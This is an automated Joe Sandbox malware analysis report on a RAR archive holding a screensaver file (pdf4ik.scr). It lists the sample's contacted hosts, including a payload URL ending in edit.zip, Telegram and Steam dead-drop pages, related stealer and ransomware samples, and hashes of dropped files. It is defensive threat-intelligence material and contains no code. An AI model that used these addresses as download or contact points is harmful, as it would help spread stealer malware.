| http://135.181.87.234:80 | 0% | Avira URL Cloud | safe | |
| http://116.203.13.130z | 0% | Avira URL Cloud | safe | |

| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
| --- | --- | --- | --- | --- | --- |
| t.me | 149.154.167.99 | true | false | | high |

| Name | Malicious | Antivirus Detection | Reputation |
| --- | --- | --- | --- |
| http://116.203.13.130/ | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown |
| https://t.me/zaskullz | false | | high |
| http://116.203.13.130/edit.zip | false | Avira URL Cloud: safe | unknown |
| https://steamcommunity.com/profiles/76561199486572327 | false | | high |

| Name | Source | Malicious | Antivirus Detection | Reputation |
| --- | --- | --- | --- | --- |
| https://t.me/: | pdf4ik.scr, 0000000C.00000002.2416733096.00000000015D8000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| https://t.me/X | pdf4ik.scr, 0000000C.00000002.2416733096.00000000015D8000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| https://steamcommunity.com/profiles/76561199486572327http://135.181.87.234:80update.zip;open_open | pdf4ik.scr, 0000000C.00000002.2422398802.0000000029ADC000.00000004.00000020.00020000.00000000.sdmp, pdf4ik.scr, 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp | false | | high |
| http://116.203.13.130/edit.zip:D | pdf4ik.scr, 0000000C.00000002.2416733096.000000000163B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://116.203.13.130/edit.zipvqD | pdf4ik.scr, 0000000C.00000002.2416733096.000000000163B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://web.telegram.org | pdf4ik.scr, 0000000C.00000002.2416733096.00000000015D8000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| http://116.203.13.130/edit.zipcac5b60b5e28992247664-7ff3f708-074b-4ff4-b2c5-87e7-806e6f6e6963 | pdf4ik.scr, 0000000C.00000002.2415135723.0000000001453000.00000004.00000010.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://116.203.13.130 | pdf4ik.scr, 0000000C.00000003.2359804569.0000000001607000.00000004.00000020.00020000.00000000.sdmp | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown |
| http://116.203.13.130/oI | pdf4ik.scr, 0000000C.00000002.2416733096.000000000163B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://116.203.13.130/edit.zipx | pdf4ik.scr, 0000000C.00000002.2416733096.00000000015D8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://116.203.13.130/edit.zip9 | pdf4ik.scr, 0000000C.00000002.2416733096.00000000015D8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://135.181.87.234:80 | pdf4ik.scr, pdf4ik.scr, 0000000C.00000002.2422398802.0000000029ADC000.00000004.00000020.00020000.00000000.sdmp, pdf4ik.scr, 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://www.autoitscript.com/autoit3 | OpenWith.exe, 00000006.00000003.1458609087.000002C74D216000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| https://support.mozilla.org | OpenWith.exe, 00000006.00000003.1458609087.000002C74D216000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000006.00000002.1469379781.000002C74D244000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| https://t.me/zaskullzfunkstaredit.zipMozilla/5.0 | pdf4ik.scr, 0000000C.00000002.2422398802.0000000029ADC000.00000004.00000020.00020000.00000000.sdmp, pdf4ik.scr, 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp | false | | high |
| http://116.203.13.130z | pdf4ik.scr, 0000000C.00000002.2424739839.000000002BAB0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low |

| IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
| --- | --- | --- | --- | --- | --- | --- |
| 116.203.13.130 | unknown | Germany | | 24940 | HETZNER-ASDE | false |
| 20.224.151.203 | unknown | United States | | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false |
| 192.229.221.95 | unknown | United States | | 15133 | EDGECASTUS | false |
| 52.109.88.191 | unknown | United States | | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false |
| 149.154.167.99 | t.me | United Kingdom | | 62041 | TELEGRAMRU | false |

                                      Joe Sandbox Version:37.0.0 Beryl
                                      Analysis ID:829691
                                      Start date and time:2023-03-18 21:37:03 +01:00
                                      Joe Sandbox Product:CloudBasic
                                      Overall analysis duration:0h 8m 31s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                      Analysis system description:Windows 10 64 bit version 1909 (MS Office 2019, IE 11, Chrome 104, Firefox 88, Adobe Reader DC 21, Java 8 u291, 7-Zip)
                                      Number of analysed new started processes analysed:17
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:1
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • HDC enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample file name:pdf_novichki.rar
                                      Detection:MAL
                                      Classification:mal80.troj.spyw.evad.winRAR@4/8@1/5
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HDC Information:
                                      • Successful, ratio: 99.3% (good quality ratio 67%)
                                      • Quality average: 53.7%
                                      • Quality standard deviation: 42.9%
                                      HCA Information:
                                      • Successful, ratio: 98%
                                      • Number of executed functions: 20
                                      • Number of non-executed functions: 159
                                      • Exclude process from analysis (whitelisted): dllhost.exe, rundll32.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, usocoreworker.exe, svchost.exe
                                      • Excluded IPs from analysis (whitelisted): 20.189.173.20
                                      • Excluded domains from analysis (whitelisted): login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, watson.telemetry.microsoft.com
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.

| Time | Type | Description |
| --- | --- | --- |
| 21:37:38 | API Interceptor | 1x Sleep call for process: OpenWith.exe modified |
| 21:39:19 | API Interceptor | 1x Sleep call for process: WerFault.exe modified |

| Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
| --- | --- | --- | --- | --- | --- | --- |
| 116.203.13.130 | setup.exe | Get hash | malicious | Clipboard Hijacker, Djvu, HTMLPhisher, Vidar | Browse | 116.203.13.130/ |
| | setup.exe | Get hash | malicious | Babuk, Clipboard Hijacker, Djvu, Vidar | Browse | 116.203.13.130/edit.zip |
| | tvfratt.exe | Get hash | malicious | Amadey, Babuk, Clipboard Hijacker, Djvu, Fabookie, SmokeLoader, Vidar | Browse | 116.203.13.130/ |
| | installer.exe | Get hash | malicious | Clipboard Hijacker, Djvu, HTMLPhisher, Vidar | Browse | 116.203.13.130/ |
| | setup.exe | Get hash | malicious | Clipboard Hijacker, Djvu, HTMLPhisher, Vidar | Browse | 116.203.13.130/ |
| | setup.exe | Get hash | malicious | Clipboard Hijacker, Djvu, Vidar | Browse | 116.203.13.130/edit.zip |
| | file.exe | Get hash | malicious | Vidar | Browse | 116.203.13.130/ |
| | 2.bin.exe | Get hash | malicious | Clipboard Hijacker, Djvu, Vidar | Browse | 116.203.13.130/ |
| | cracksetup.exe | Get hash | malicious | Babuk, Clipboard Hijacker, Djvu, Vidar | Browse | 116.203.13.130/edit.zip |
| | setup.exe | Get hash | malicious | Babuk, Clipboard Hijacker, Djvu, Vidar | Browse | 116.203.13.130/edit.zip |
| | setup.exe | Get hash | malicious | Babuk, Clipboard Hijacker, Djvu, Vidar | Browse | 116.203.13.130/edit.zip |
| | setup.exe | Get hash | malicious | Babuk, Clipboard Hijacker, Djvu, Vidar | Browse | 116.203.13.130/ |
| | file.exe | Get hash | malicious | Babuk, Clipboard Hijacker, Djvu, HTMLPhisher, Vidar | Browse | 116.203.13.130/ |
| | setup.exe | Get hash | malicious | Babuk, Clipboard Hijacker, Djvu, Vidar | Browse | 116.203.13.130/ |
| | setup.exe | Get hash | malicious | Babuk, Clipboard Hijacker, Djvu, Vidar | Browse | 116.203.13.130/edit.zip |
| | setup.exe | Get hash | malicious | Babuk, Clipboard Hijacker, Djvu, Vidar | Browse | 116.203.13.130/edit.zip |
| | setup.exe | Get hash | malicious | Babuk, Clipboard Hijacker, Djvu, Vidar | Browse | 116.203.13.130/ |
| | setup.exe | Get hash | malicious | Clipboard Hijacker, Djvu, HTMLPhisher, Vidar | Browse | 116.203.13.130/ |

| Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
| --- | --- | --- | --- | --- | --- | --- |
| t.me | setup.exe | Get hash | malicious | Clipboard Hijacker, Djvu, HTMLPhisher, Vidar | Browse | 149.154.167.99 |
| | setup.exe | Get hash | malicious | Babuk, Clipboard Hijacker, Djvu, Vidar | Browse | 149.154.167.99 |
| | tvfratt.exe | Get hash | malicious | Amadey, Babuk, Clipboard Hijacker, Djvu, Fabookie, SmokeLoader, Vidar | Browse | 149.154.167.99 |
| | installer.exe | Get hash | malicious | Clipboard Hijacker, Djvu, HTMLPhisher, Vidar | Browse | 149.154.167.99 |
| | setup.exe | Get hash | malicious | Clipboard Hijacker, Djvu, HTMLPhisher, Vidar | Browse | 149.154.167.99 |
| | setup.exe | Get hash | malicious | Clipboard Hijacker, Djvu, Vidar | Browse | 149.154.167.99 |
| | file.exe | Get hash | malicious | Vidar | Browse | 149.154.167.99 |
| | 2.bin.exe | Get hash | malicious | Clipboard Hijacker, Djvu, Vidar | Browse | 149.154.167.99 |
| | file.exe | Get hash | malicious | Vidar | Browse | 149.154.167.99 |
| | cracksetup.exe | Get hash | malicious | Babuk, Clipboard Hijacker, Djvu, Vidar | Browse | 149.154.167.99 |
| | setup.exe | Get hash | malicious | Babuk, Clipboard Hijacker, Djvu, Vidar | Browse | 149.154.167.99 |
| | setup.exe | Get hash | malicious | Babuk, Clipboard Hijacker, Djvu, Vidar | Browse | 149.154.167.99 |
| | setup.exe | Get hash | malicious | Babuk, Clipboard Hijacker, Djvu, Vidar | Browse | 149.154.167.99 |
| | file.exe | Get hash | malicious | Babuk, Clipboard Hijacker, Djvu, HTMLPhisher, Vidar | Browse | 149.154.167.99 |
| | dot_net_crypted.exe | Get hash | malicious | Vidar | Browse | 149.154.167.99 |
| | setup.exe | Get hash | malicious | Babuk, Clipboard Hijacker, Djvu, Vidar | Browse | 149.154.167.99 |
| | https://weblive4k.com/the-Highlanders/ | Get hash | malicious | Unknown | Browse | 46.105.201.240 |
| | setup.exe | Get hash | malicious | Babuk, Clipboard Hijacker, Djvu, Vidar | Browse | 149.154.167.99 |
| | setup.exe | Get hash | malicious | Babuk, Clipboard Hijacker, Djvu, Vidar | Browse | 149.154.167.99 |
| | setup.exe | Get hash | malicious | Babuk, Clipboard Hijacker, Djvu, Vidar | Browse | 149.154.167.99 |

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      HETZNER-ASDEsetup.exeGet hashmaliciousClipboard Hijacker, Djvu, HTMLPhisher, VidarBrowse
                                      • 116.203.13.130
                                      Launcher.exeGet hashmaliciousRHADAMANTHYS, RedLineBrowse
                                      • 94.130.181.125
                                      0E0BD47371B5E50FC51F147DC456949F8DB70EC27B644.exeGet hashmaliciousRedLineBrowse
                                      • 5.75.147.135
                                      setup.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                      • 116.203.13.130
                                      f_00321b.dllGet hashmaliciousEmotetBrowse
                                      • 95.217.221.146
                                      f_00321b.dllGet hashmaliciousEmotetBrowse
                                      • 95.217.221.146
                                      f_00321b.dllGet hashmaliciousEmotetBrowse
                                      • 95.217.221.146
                                      tvfratt.exeGet hashmaliciousAmadey, Babuk, Clipboard Hijacker, Djvu, Fabookie, SmokeLoader, VidarBrowse
                                      • 116.203.13.130
                                      installer.exeGet hashmaliciousClipboard Hijacker, Djvu, HTMLPhisher, VidarBrowse
                                      • 116.203.13.130
                                      setup.exeGet hashmaliciousClipboard Hijacker, Djvu, HTMLPhisher, VidarBrowse
                                      • 116.203.13.130
                                      setup.exeGet hashmaliciousClipboard Hijacker, Djvu, VidarBrowse
                                      • 116.203.13.130
                                      file.exeGet hashmaliciousVidarBrowse
                                      • 116.203.13.130
                                      GXA2jht1bf.exeGet hashmaliciousSystemBCBrowse
                                      • 78.47.64.46
                                      GXA2jht1bf.exeGet hashmaliciousSystemBCBrowse
                                      • 78.47.64.46
                                      Paralysis.x86_64.elfGet hashmaliciousMiraiBrowse
                                      • 78.47.94.122
                                      2.bin.exeGet hashmaliciousClipboard Hijacker, Djvu, VidarBrowse
                                      • 116.203.13.130
                                      7rSoC1BfML.exeGet hashmaliciousAmadey, Nymaim, RedLine, SmokeLoader, Stealc, VidarBrowse
                                      • 148.251.234.83
                                      https://knowledgeburrow.com/did-benjamin-franklin-really-say-if-you-fail-to-plan-you-are-planning-to-fail/Get hashmaliciousUnknownBrowse
                                      • 195.201.152.105
                                      https://megacanabisdispensary.com/Get hashmaliciousGRQ ScamBrowse
                                      • 95.216.69.114
                                      Z0ZpvNkW6R.elfGet hashmaliciousMiraiBrowse
                                      • 195.201.97.174
                                      MICROSOFT-CORP-MSN-AS-BLOCKUSnK2Tb6Zm62.elfGet hashmaliciousMiraiBrowse
                                      • 20.199.155.90
                                      IGpJmlvBoU.elfGet hashmaliciousMiraiBrowse
                                      • 40.92.220.254
                                      setup.exeGet hashmaliciousAmadey, Djvu, Fabookie, RHADAMANTHYS, SmokeLoaderBrowse
                                      • 20.189.173.20
                                      setup.exeGet hashmaliciousAmadey, Djvu, Fabookie, RHADAMANTHYS, SmokeLoaderBrowse
                                      • 20.189.173.20
                                      MCKPGDXGzR.elfGet hashmaliciousMiraiBrowse
                                      • 72.155.240.182
                                      sora.arm.elfGet hashmaliciousMiraiBrowse
                                      • 65.52.164.129
                                      https://wy3k.adj.st/deeplink_default_appopen?adj_t=om3pxuk_zgvu7py&adj_campaign=branded_app_collateral_socal-la_sp21-5147&adj_adgroup=prov_socal-la_all_email&adj_creative=tickler-all-others&adj_fallback=https%3a%2f%2f22rkb9.codesandbox.io?gq=Y2xlYWh5QGhhcnJpc3dpbGxpYW1zLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                      • 52.109.88.191
                                      JgzCotKhYg.elfGet hashmaliciousMirai, MoobotBrowse
                                      • 157.55.204.16
                                      hMOUwBN0Cs.elfGet hashmaliciousMirai, MoobotBrowse
                                      • 20.232.177.167
                                      31eLibxfJL.elfGet hashmaliciousMirai, MoobotBrowse
                                      • 51.145.168.28
                                      enrWdlZ2wY.elfGet hashmaliciousMirai, MoobotBrowse
                                      • 20.85.193.139
                                      sj6SYjQHo0.exeGet hashmaliciousAmadey, Babuk, Clipboard Hijacker, Djvu, RHADAMANTHYS, SmokeLoaderBrowse
                                      • 52.182.143.212
                                      2QF0HzvFfv.exeGet hashmaliciousAmadey, Djvu, Fabookie, SmokeLoaderBrowse
                                      • 20.42.65.92
                                      http://landgatewagovau.sharepoint.comGet hashmaliciousUnknownBrowse
                                      • 13.107.237.60
                                      hiqPUcOHaw.exeGet hashmaliciousRedLineBrowse
                                      • 52.232.8.179
                                      jew.x86.elfGet hashmaliciousMiraiBrowse
                                      • 40.111.26.222
                                      PDwvmn4KzV.elfGet hashmaliciousMirai, MoobotBrowse
                                      • 157.56.241.233
                                      yAnWn3BP4r.elfGet hashmaliciousMirai, MoobotBrowse
                                      • 157.55.40.141
                                      evzFC7ldP1.elfGet hashmaliciousMirai, MoobotBrowse
                                      • 157.56.241.229
                                      pandora.x86.elfGet hashmaliciousMiraiBrowse
                                      • 13.99.132.13
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      37f463bf4616ecd445d4a1937da06e19setup.exeGet hashmaliciousClipboard Hijacker, Djvu, HTMLPhisher, VidarBrowse
                                      • 149.154.167.99
                                      setup.exeGet hashmaliciousAmadey, Djvu, SmokeLoaderBrowse
                                      • 149.154.167.99
                                      setup.exeGet hashmaliciousDjvuBrowse
                                      • 149.154.167.99
                                      setup.exeGet hashmaliciousDjvuBrowse
                                      • 149.154.167.99
                                      setup.exeGet hashmaliciousDjvuBrowse
                                      • 149.154.167.99
                                      setup.exeGet hashmaliciousDjvuBrowse
                                      • 149.154.167.99
                                      setup.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                      • 149.154.167.99
                                      setup.exeGet hashmaliciousAmadey, Djvu, Fabookie, RHADAMANTHYS, SmokeLoaderBrowse
                                      • 149.154.167.99
                                      tvfratt.exeGet hashmaliciousAmadey, Babuk, Clipboard Hijacker, Djvu, Fabookie, SmokeLoader, VidarBrowse
                                      • 149.154.167.99
                                      installer.exeGet hashmaliciousClipboard Hijacker, Djvu, HTMLPhisher, VidarBrowse
                                      • 149.154.167.99
                                      F49C.exeGet hashmaliciousDjvuBrowse
                                      • 149.154.167.99
                                      setup.exeGet hashmaliciousClipboard Hijacker, Djvu, HTMLPhisher, VidarBrowse
                                      • 149.154.167.99
                                      setup.exeGet hashmaliciousClipboard Hijacker, Djvu, VidarBrowse
                                      • 149.154.167.99
                                      setup.exeGet hashmaliciousDjvuBrowse
                                      • 149.154.167.99
                                      file.exeGet hashmaliciousVidarBrowse
                                      • 149.154.167.99
                                      sj6SYjQHo0.exeGet hashmaliciousAmadey, Babuk, Clipboard Hijacker, Djvu, RHADAMANTHYS, SmokeLoaderBrowse
                                      • 149.154.167.99
                                      2QF0HzvFfv.exeGet hashmaliciousAmadey, Djvu, Fabookie, SmokeLoaderBrowse
                                      • 149.154.167.99
                                      Rechung-R1663322504.exeGet hashmaliciousGuLoaderBrowse
                                      • 149.154.167.99
                                      2.bin.exeGet hashmaliciousClipboard Hijacker, Djvu, VidarBrowse
                                      • 149.154.167.99
                                      1.bin.exeGet hashmaliciousBabuk, DjvuBrowse
                                      • 149.154.167.99
                                      No context
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):1.057425348490445
                                      Encrypted:false
                                      SSDEEP:192:m4Ouj6hLHBUD8hcj6SgKWmW1au7sVr74ItWe:Euj6tBUD82jvA1au7sVX4ItWe
                                      MD5:5A0AF8B3AED364F2C1218082244E440A
                                      SHA1:CA3AE901CA07E693DF8D5BBBE51D7EC2EB03617C
                                      SHA-256:6D6FCB03A0339A25F581F958D543D197184D80F787D978946E254C3C8E5A1940
                                      SHA-512:6E116D83EB41491FEEFCF8C66303DFD1FAEE9CF81E16E18343051FCD12229C9F48BB08A88108F05619F075E4682942F69103146C99D71979A1942A6139AEA07F
                                      Malicious:true
                                      Reputation:low
                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.2.3.6.4.5.5.5.5.8.3.9.4.6.8.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.2.3.6.4.5.5.5.8.0.3.9.4.6.2.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.9.6.5.3.c.c.3.-.7.d.c.a.-.4.c.6.4.-.8.b.a.1.-.b.0.9.5.8.4.5.8.2.b.0.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.9.9.c.0.a.0.8.-.e.c.8.a.-.4.9.e.f.-.a.8.a.a.-.b.4.0.0.5.7.8.1.9.e.0.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.p.d.f.4.i.k...s.c.r.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.0.4.-.0.0.0.1.-.0.0.1.5.-.7.3.7.a.-.0.9.a.c.d.9.5.9.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.8.b.9.2.0.e.a.f.8.a.9.2.4.9.d.e.7.9.3.c.e.2.2.4.5.f.2.6.a.8.b.0.0.0.0.e.4.0.4.!.0.0.0.0.6.c.c.e.0.4.8.6.8.4.b.1.a.9.9.2.d.c.d.f.4.4.2.1.7.f.1.f.3.1.1.7.4.7.0.6.4.c.c.0.!.p.d.f.4.i.k...s.c.r.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.3.
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:Mini DuMP crash report, 14 streams, Sat Mar 18 20:39:16 2023, 0x1205a4 type
                                      Category:dropped
                                      Size (bytes):765694
                                      Entropy (8bit):1.8899497618258603
                                      Encrypted:false
                                      SSDEEP:1536:CXFVBcM9ta3tEhfchQpouc8reQ9R/Z58Dv8UM3X:mEJSq8rwD0
                                      MD5:05DEE22202A8EEFC84C9180C1F016E09
                                      SHA1:41F31BCA899BFB86CB0A88118092D1B3C5FEF776
                                      SHA-256:C94213F511F28805322F157009DB67263C2A5019DD1C70C547A9248D4A01711B
                                      SHA-512:3087625210E28C2613588A25BA4326A4C3B88C3C34FC8A2059AC0B30047D3B68259CD6C177336093AEC31EE67152E7A5DCDF8A85A6FD2794875C5510F16B3C49
                                      Malicious:false
                                      Reputation:low
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):8354
                                      Entropy (8bit):3.7029609973010493
                                      Encrypted:false
                                      SSDEEP:192:R0l7PW/NiHm6PRhn6Y1RSUr8gmf7tbFph/Ciprz89bFSsfLZXm:R0lcNiG6PRR6YDSUr8gmf7tbjOFRfo
                                      MD5:3192F79A9CDA48FBC8DFFEA17D1480A7
                                      SHA1:806E9B8A5709C31D4930933B07B90E360D4D3F0F
                                      SHA-256:615A6BDC5806289E74E09B04C3E08D7359E1E88986AD7D1B41523579C37918ED
                                      SHA-512:1E0DC45D9BD1294220EDE35719D2A50632E12C4ADCA0111904130516FD43AEE8AAADEA4F4CF0EE63A75C659BFA4F7FCFCBF6B4106EEE6284374DC0C1998587A6
                                      Malicious:false
                                      Reputation:low
                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.8.3.6.3.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.8.3.6.2...4.1.8...a.m.d.6.4.f.r.e...1.9.h.1._.r.e.l.e.a.s.e...1.9.0.3.1.8.-.1.2.0.2.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.4.1.8.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.9.1.6.<./.P.i.
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):4577
                                      Entropy (8bit):4.4566277652299195
                                      Encrypted:false
                                      SSDEEP:48:cvIwRD8zsqdWh5YI9TjWgc8sqYQbgm8M4JQ4xVlFE+q8ZkV0UXiFsd:uIeft5TSgrsqYzJQCVkRV0UXiFsd
                                      MD5:497292D65168D680F388F9580A462607
                                      SHA1:78D558DB9251ED77569DE2A9B4ABF218DB85CE00
                                      SHA-256:21541AFFE12EBC7FF06A8D724A3F0371DA90A0B8E100D1E3CA484145A7CF9E29
                                      SHA-512:EE33A5DD51EDF09565467CD57BEC9150812CE24DA53D0707DE5A288E17759EE7A531B1BEAAD6B0700FE2E742CAFCF29D94B91DC216CFB2617FD6E9B5531DFDF1
                                      Malicious:false
                                      Reputation:low
                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="18363" />.. <arg nm="vercsdbld" val="418" />.. <arg nm="verqfe" val="418" />.. <arg nm="csdbld" val="418" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="950783" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.418.18362.0-11.0.155" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" /
                                      Process:C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE
                                      File Type:data
                                      Category:modified
                                      Size (bytes):4096
                                      Entropy (8bit):4.1093274886622515
                                      Encrypted:false
                                      SSDEEP:24:Yfy7CCuEP4uEcuEepuEORFuEMEuECduEwWuEi8uEP6uEuBuE4bs1ouE8BKuEVaZE:Yfy7C8tbaSxvaDALbyqX
                                      MD5:ABB4C44B2B1018A54F382A05B002BFB8
                                      SHA1:BC3DF6777A93051857CC1649DE6D5059B4764A18
                                      SHA-256:B742A5C1D0229C4967FEAC5081339B6A30C3139821FB5C0ABFA6850BF1E23296
                                      SHA-512:90F5290CFDF548B03FE0D29585671D4B6C79E0415269AF931ED772EB4D6AE8D882A803604F78D10CE7AACF0ACDBE3DED2378A54B50BC659C803F6015AAF78C00
                                      Malicious:false
                                      Reputation:low
                                      Process:C:\Program Files\7-Zip\7zG.exe
                                      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 5.0, MSI Installer, Code page: 1252, Title: Installation Database, Subject: PuTTY release 0.78 installer, Author: Simon Tatham, Keywords: Installer, Comments: This installer database contains the logic and data required to install PuTTY release 0.78 (64-bit)., Template: x64;1033, Revision Number: {F5BABDF1-815A-4F73-82E1-B79790A1551E}, Create Time/Date: Fri Oct 28 19:24:49 2022, Last Saved Time/Date: Fri Oct 28 19:24:49 2022, Number of Pages: 200, Number of Words: 2, Number of Characters: 0, Name of Creating Application: Windows Installer XML Toolset (), Security: 2
                                      Category:dropped
                                      Size (bytes):3705856
                                      Entropy (8bit):7.837448100594935
                                      Encrypted:false
                                      SSDEEP:98304:Ujhyh9EoxGHgBRn8Tg4IDrwRW8FMDMb34+NHC6:UjhyJPR8Tg4IDrwdFMD048
                                      MD5:108B432C4DC0A66B657D985E180BEC71
                                      SHA1:262812D43303B7DDC7C04A1C243172EBE6579F00
                                      SHA-256:E64775374097F1B1C8FD4173F7D5BE4305B88CEC26A56D003113AFF2837AE08E
                                      SHA-512:5DDB97078B417F22C54DCE768564DEC58FD92A9C190F7A6CAC9C7979A0F136DD439DA1D59DD3C088E709433F5C4F79C033ABD4B6CA8989D38620C20F4623386E
                                      Malicious:false
                                      Reputation:low
                                      Process:C:\Program Files\7-Zip\7zG.exe
                                      File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                      Category:dropped
                                      Size (bytes):1153453336
                                      Entropy (8bit):0.09316002155911432
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:B082DDE06D83A96B2B35A49387E3C12A
                                      SHA1:95332FDE148D4E6A5E7160126CC8EEB2644CA54A
                                      SHA-256:64A764DE52A8BCDDD5A3CFEA7B9A474FB239E8B7CB9B4CBF839C9F9FBCDD4251
                                      SHA-512:31C5A66EAC51DA5A04A491DAED970128AF9282074FD129E9CDC8F1A176DC1D7EC75DF818BE5315D440C2D2817286EFEC2981777AED034EAABC87594577341DEF
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      Process:C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):5139
                                      Entropy (8bit):1.9174231909950206
                                      Encrypted:false
